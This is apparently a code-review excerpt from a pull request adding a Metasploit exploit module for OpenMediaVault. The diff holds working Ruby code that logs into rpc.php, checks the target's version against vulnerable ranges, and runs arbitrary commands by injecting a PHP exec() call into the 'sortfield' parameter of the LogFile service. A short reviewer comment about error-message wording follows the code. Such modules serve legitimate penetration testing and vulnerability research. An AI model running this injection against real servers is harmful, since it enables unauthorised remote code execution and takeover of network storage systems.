modules/exploits/unix/webapp/openmediavault_rpc_rce.rb

```diff
@@ -0,0 +1,216 @@
+      ]
+    )
+  end
+
+  def user
+    datastore['USERNAME']
+  end
+
+  def pass
+    datastore['PASSWORD']
+  end
+
+  def login(user, pass, _opts = {})
+    print_status("#{peer} - Authenticating with OpenMediaVault using #{user}:#{pass}...")
+    @uri = normalize_uri(target_uri.path, '/rpc.php')
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => {
+        "service": 'Session',
+        "method": 'login',
+        "params": {
+          "username": user.to_s,
+          "password": pass.to_s
+        },
+        "options": nil
+      }.to_json
+    })
+    unless res
+      # We return nil here, as callers should handle this case
+      # specifically with their own unique error message.
+      return nil
+    end
+
+    if res.code == 200 && res.body.scan('"authenticated":true,').flatten.first && res.get_cookies.scan(/X-OPENMEDIAVAULT-SESSIONID=(\w+);*/).flatten.first
+      @cookie = res.get_cookies
+    end
+    return res
+  rescue ::Rex::ConnectionError
+    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
+    return nil
+  end
+
+  def get_target
+    print_status("#{peer} - Trying to detect if target is running a supported version of OpenMediaVault.")
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => @cookie.to_s,
+      'data' => {
+        "service": 'System',
+        "method": 'getInformation',
+        "params": nil,
+        "options": {
+          "updatelastaccess": false
+        }
+      }.to_json
+    })
+    version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+    if version.nil?
+      print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
+      return nil
+    end
+    print_good("#{peer} - Identified OpenMediaVault version #{version}.")
+    version_gemmed = Gem::Version.new(version)
+    if version_gemmed < Gem::Version.new('3.0.1')
+      return version
+    elsif version_gemmed >= Gem::Version.new('4.0.0') && version_gemmed < Gem::Version.new('4.1.36')
+      return version
+    elsif version_gemmed >= Gem::Version.new('5.0.0') && version_gemmed < Gem::Version.new('5.5.12')
+      return version
+    else
+      return nil
+    end
+
+    return version
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => @cookie.to_s,
+      'data' => {
+        "service": 'LogFile',
+        "method": 'getList',
+        "params": {
+          "id": 'apt_history',
+          "start": 0,
+          "limit": 50,
+          "sortfield": "'.exec(\"#{cmd}\").'",
+          "sortdir": 'DESC'
+        },
+        "options": nil
+      }.to_json
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
```

Comment:
Seeing as you have been stating where the exception was thrown for other cases of `ConnectionError` would it not be good to state something like `Rex::ConnectionError caught whilst attempting to execute our desired command, could not connect to the target.`